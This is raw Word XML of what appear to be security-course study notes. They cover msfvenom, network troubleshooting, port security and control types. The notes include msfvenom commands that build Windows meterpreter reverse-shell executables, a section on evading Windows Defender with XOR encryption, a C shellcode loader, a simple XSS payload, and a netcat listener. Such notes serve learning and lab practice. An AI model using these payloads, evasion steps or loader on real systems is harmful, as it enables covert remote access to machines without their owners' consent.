    <w:p w14:paraId="290D5B63" w14:textId="11454EF5" w:rsidR="003C71DE" w:rsidRDefault="003C71DE" w:rsidP="00B34758">
      <w:pPr>
        <w:pStyle w:val="Overskrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc198019364"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="78343679" w14:textId="2A416005" w:rsidR="0064197D" w:rsidRPr="005B4891" w:rsidRDefault="00A00FDF" w:rsidP="00B34758">
      <w:pPr>
        <w:pStyle w:val="Overskrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc198019365"/>
      <w:r w:rsidRPr="005B4891">
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe &gt; payload.exe</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="5808F537" w14:textId="37BC859A" w:rsidR="006C3720" w:rsidRPr="00A05553" w:rsidRDefault="006C3720" w:rsidP="009B101B">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc198019366"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Avoid windows defender:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="1B747CE8" w14:textId="057D34E7" w:rsidR="0041121D" w:rsidRPr="005B4891" w:rsidRDefault="003B50C4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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E2D0E39" wp14:editId="08ADFCE0">
            <wp:extent cx="3074276" cy="1410059"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="348018834" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, Fon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18834" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, Font&#10;&#10;KI-generert innhold kan være feil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875" cy="142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074C" w14:textId="357682BD" w:rsidR="006C3720" w:rsidRPr="005B4891" w:rsidRDefault="005C033F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Metasploit framework</w:t>
      </w:r>
      <w:r w:rsidR="006C3720" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> with obfuscation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B1E137" w14:textId="3B9DB605" w:rsidR="006C3720" w:rsidRPr="005B4891" w:rsidRDefault="006C3720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msfvenom -p windows/meterpreter/reverse_https LHOST=&lt;your-ip&gt; LPORT=443 --encrypt xor --encrypt-key "randomkey" -f exe &gt; payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4DE374" w14:textId="77777777" w:rsidR="00D46C07" w:rsidRPr="005B4891" w:rsidRDefault="00D46C07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7189118E" w14:textId="251EB2BE" w:rsidR="00D46C07" w:rsidRPr="005B4891" w:rsidRDefault="00D46C07" w:rsidP="00D5401B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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25BBE689" wp14:editId="7844B08F">
            <wp:extent cx="3941196" cy="1686911"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="2126154216" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, programvare, Multimedieprogramvar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54216" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, programvare, Multimedieprogramvare&#10;&#10;KI-generert innhold kan være feil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5145" cy="16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5841" w14:textId="5DB570C0" w:rsidR="00BB47D9" w:rsidRPr="00A05553" w:rsidRDefault="00AA5CA6" w:rsidP="009B101B">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc198019367"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="4111B3E6" w14:textId="1E6AC130" w:rsidR="00B83DED" w:rsidRPr="005B4891" w:rsidRDefault="00B83DED" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="0083103B" w:rsidRPr="005B4891">
        <w:t>alert(“XSS</w:t>
      </w:r>
      <w:r w:rsidR="00F44491" w:rsidRPr="005B4891">
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidR="0083103B" w:rsidRPr="005B4891">
        <w:t>”)</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4136A35A" w14:textId="77777777" w:rsidR="00AA5CA6" w:rsidRPr="005B4891" w:rsidRDefault="00AA5CA6" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741356A5" w14:textId="77777777" w:rsidR="000C63D9" w:rsidRPr="005B4891" w:rsidRDefault="000C63D9" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C6560B" w14:textId="77777777" w:rsidR="000C63D9" w:rsidRPr="005B4891" w:rsidRDefault="000C63D9" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>unsigned char shellcode[] = { /* msfvenom output */ };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADF94D9" w14:textId="77777777" w:rsidR="000C63D9" w:rsidRPr="005B4891" w:rsidRDefault="000C63D9" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E5E3328" w14:textId="77777777" w:rsidR="000C63D9" w:rsidRPr="005B4891" w:rsidRDefault="000C63D9" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDD55C8" w14:textId="0374A265" w:rsidR="000C63D9" w:rsidRPr="005B4891" w:rsidRDefault="000C63D9" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve">    void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C30A1BD" w14:textId="77777777" w:rsidR="000C63D9" w:rsidRPr="005B4891" w:rsidRDefault="000C63D9" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve">    memcpy(exec, shellcode, sizeof shellcode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B99F75" w14:textId="77777777" w:rsidR="000C63D9" w:rsidRPr="005B4891" w:rsidRDefault="000C63D9" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve">    ((void(*)())exec)();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1489FE" w14:textId="38E6F01B" w:rsidR="00C12F84" w:rsidRPr="005B4891" w:rsidRDefault="000C63D9" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F267C0" w14:textId="77777777" w:rsidR="00E442BC" w:rsidRPr="005B4891" w:rsidRDefault="00E442BC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294C0780" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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7931972B" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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359D2732" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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46E21006" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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565D041B" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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0D289350" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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6B58C0FE" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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24C1B044" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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78A16855" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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5AB2648F" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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42FE432C" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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408AF3E8" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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13C8DC12" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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6264CCC7" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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68E99140" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7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027D8638" w14:textId="0204BAAA" w:rsidR="00655C06" w:rsidRPr="00A05553" w:rsidRDefault="00B0512A" w:rsidP="009B101B">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc198019368"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Troubleshooting TCP etc.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="710F302E" w14:textId="77777777" w:rsidR="00B0512A" w:rsidRPr="005B4891" w:rsidRDefault="00B0512A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309B86F6" w14:textId="408AF21E" w:rsidR="00B0512A" w:rsidRPr="005B4891" w:rsidRDefault="00B0512A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 xml:space="preserve">Ping </w:t>
      </w:r>
      <w:r w:rsidR="0011577B" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54143526" w14:textId="77777777" w:rsidR="0011577B" w:rsidRPr="005B4891" w:rsidRDefault="0011577B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010C7FA6" w14:textId="3E38D602" w:rsidR="0011577B" w:rsidRPr="005B4891" w:rsidRDefault="0011577B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Nc -zv &lt;target_ip&gt; &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A697A7D" w14:textId="184F2746" w:rsidR="0011577B" w:rsidRPr="005B4891" w:rsidRDefault="0011577B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Ip a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498F87F2" w14:textId="77777777" w:rsidR="0011577B" w:rsidRPr="005B4891" w:rsidRDefault="0011577B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22FDAFD7" w14:textId="10756E6F" w:rsidR="0011577B" w:rsidRPr="005B4891" w:rsidRDefault="0011577B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Ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9DB58B" w14:textId="3644FA0F" w:rsidR="0011577B" w:rsidRPr="005B4891" w:rsidRDefault="0011577B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Ss -tul</w:t>
      </w:r>
      <w:r w:rsidR="00367B16" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>np | grep &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC535E9" w14:textId="77777777" w:rsidR="00367B16" w:rsidRPr="005B4891" w:rsidRDefault="00367B16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5A07DD8A" w14:textId="4CFF5586" w:rsidR="00367B16" w:rsidRPr="005B4891" w:rsidRDefault="00367B16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Netstat -tulnp | grep &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A49F721" w14:textId="77777777" w:rsidR="00367B16" w:rsidRPr="005B4891" w:rsidRDefault="00367B16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39EBEA74" w14:textId="249FCFAA" w:rsidR="00367B16" w:rsidRPr="005B4891" w:rsidRDefault="00367B16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Ip tables -L -n -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5618F3FA" w14:textId="77777777" w:rsidR="00367B16" w:rsidRPr="005B4891" w:rsidRDefault="00367B16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6C9559A1" w14:textId="2E7DD891" w:rsidR="006C428F" w:rsidRPr="005B4891" w:rsidRDefault="006C428F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Firewalld-cmd –list-all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B816F39" w14:textId="6EBEFAF8" w:rsidR="002934FD" w:rsidRPr="005B4891" w:rsidRDefault="006C428F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 xml:space="preserve">Iptables -A INPUT </w:t>
      </w:r>
      <w:r w:rsidR="002934FD" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-p tcp -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B31122" w14:textId="2C318FBA" w:rsidR="002934FD" w:rsidRPr="005B4891" w:rsidRDefault="002934FD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Iptables-save &gt; /etc/sysconfig/iptables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B171523" w14:textId="77777777" w:rsidR="002934FD" w:rsidRPr="005B4891" w:rsidRDefault="002934FD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007FADE1" w14:textId="1181FBAD" w:rsidR="002934FD" w:rsidRPr="005B4891" w:rsidRDefault="00C73901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Firewall-cmd –add-port-&lt;port&gt;/tcp –permanent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBE4756" w14:textId="01567D0A" w:rsidR="000B6DF3" w:rsidRPr="005B4891" w:rsidRDefault="000B6DF3" w:rsidP="00753763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Fir</w:t>
      </w:r>
      <w:r w:rsidR="00753763" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wall-cmd –reload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CA77D2" w14:textId="73D637FD" w:rsidR="000B6DF3" w:rsidRPr="005B4891" w:rsidRDefault="000B6DF3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Sestatus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6331A8CD" w14:textId="1A6E2ADF" w:rsidR="000B6DF3" w:rsidRPr="005B4891" w:rsidRDefault="000B6DF3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Setenforce 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED4E435" w14:textId="0E703FDD" w:rsidR="00541BAA" w:rsidRPr="005B4891" w:rsidRDefault="000B6DF3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Nc -lvnp &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1B677F" w14:textId="2ABF6EFB" w:rsidR="0041121D" w:rsidRPr="005B4891" w:rsidRDefault="00541BAA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 xml:space="preserve">Tcpdump -I &lt;interface&gt; port </w:t>
      </w:r>
      <w:r w:rsidR="00E17E59" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190D3D93" w14:textId="58914718" w:rsidR="00F032D8" w:rsidRPr="005B4891" w:rsidRDefault="002A71E1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Jump-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265AFEEC" w14:textId="77777777" w:rsidR="002A71E1" w:rsidRPr="005B4891" w:rsidRDefault="002A71E1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7063A699" w14:textId="3ABCA558" w:rsidR="002A71E1" w:rsidRPr="005B4891" w:rsidRDefault="002A71E1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You want it at the edge of the solution</w:t>
      </w:r>
      <w:r w:rsidR="002F450B" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> for protecting private subnets that </w:t>
      </w:r>
      <w:r w:rsidR="00E21F07" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>don’t allow internet acc</w:t>
      </w:r>
      <w:r w:rsidR="007E4506" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00E21F07" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C5E6CB" w14:textId="06CD8A5C" w:rsidR="00753763" w:rsidRPr="00A05553" w:rsidRDefault="001A6C5F" w:rsidP="00E442BC">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc198019369"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Port Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="57081F32" w14:textId="77777777" w:rsidR="00267967" w:rsidRPr="005B4891" w:rsidRDefault="00267967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42BD9E6D" w14:textId="140141F7" w:rsidR="001A6C5F" w:rsidRPr="005B4891" w:rsidRDefault="001A6C5F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Trunk ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBD4D21" w14:textId="7AAEA6FF" w:rsidR="001A6C5F" w:rsidRPr="005B4891" w:rsidRDefault="001A6C5F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 xml:space="preserve">Can carry the traffic of many </w:t>
      </w:r>
      <w:r w:rsidR="001F3830" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">different systems </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3648C8F5" w14:textId="77777777" w:rsidR="001F3830" w:rsidRPr="005B4891" w:rsidRDefault="001F3830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68983C71" w14:textId="56E259CD" w:rsidR="001F3830" w:rsidRPr="005B4891" w:rsidRDefault="001F3830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Access ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D532ABC" w14:textId="2D472870" w:rsidR="001F3830" w:rsidRPr="005B4891" w:rsidRDefault="001F3830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 xml:space="preserve">Carry the traffic of 1 or 2 </w:t>
      </w:r>
      <w:r w:rsidR="009A2A3A" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDA1451" w14:textId="77777777" w:rsidR="001A6C5F" w:rsidRPr="005B4891" w:rsidRDefault="001A6C5F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</w:p>
    <w:p w14:paraId="49A50091" w14:textId="2D567EC0" w:rsidR="00D14B43" w:rsidRPr="005B4891" w:rsidRDefault="00D14B43" w:rsidP="000C63D9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2902"/>
          <w:tab w:val="left" w:pos="5118"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cisco packet tracer check security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFF0CB6" w14:textId="7F3F1BEA" w:rsidR="00D14B43" w:rsidRPr="005B4891" w:rsidRDefault="00413433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s</w:t>
      </w:r>
      <w:r w:rsidR="00D14B43" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">how </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>port-security interface fastEthernet0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC49940" w14:textId="77777777" w:rsidR="00DA7F0F" w:rsidRPr="005B4891" w:rsidRDefault="00DA7F0F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3A5034A8" w14:textId="29819AA8" w:rsidR="00C27A60" w:rsidRPr="005B4891" w:rsidRDefault="00C27A60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Selecting Effective Control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A2EC8" w:rsidRPr="005B4891" w14:paraId="3F72D01B" w14:textId="77777777" w:rsidTr="007A2EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2265" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FC1C9E4" w14:textId="77777777" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="007A2EC8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5" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="386AF67C" w14:textId="3B592A7B" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="007A2EC8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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Preventative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A7ED7E6" w14:textId="3C461F66" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="007A2EC8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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Detective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F2D7F20" w14:textId="413CD33B" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="007A2EC8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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Corrective</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2EC8" w:rsidRPr="005B4891" w14:paraId="3D186F00" w14:textId="77777777" w:rsidTr="00171C56">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2265" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32A681CA" w14:textId="6FC761E6" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="007A2EC8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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Physical Controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2265" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38CDDE07" w14:textId="3A59B0C6" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="00171C56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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Gates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CCB7C7F" w14:textId="19CE14E8" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="00171C56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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cameras</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3573F8B1" w14:textId="554916EC" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="00171C56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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Re-issue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2EC8" w:rsidRPr="005B4891" w14:paraId="1F4025A4" w14:textId="77777777" w:rsidTr="00171C56">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2265" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D671E86" w14:textId="389D7B20" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="00171C56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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Technical Controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2265" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="280AFE7B" w14:textId="2435B136" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="00171C56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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48D17BA4" w14:textId="2B129737" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="00171C56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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27811CF2" w14:textId="67C2A98C" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="00171C56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891">
              <w:rPr>
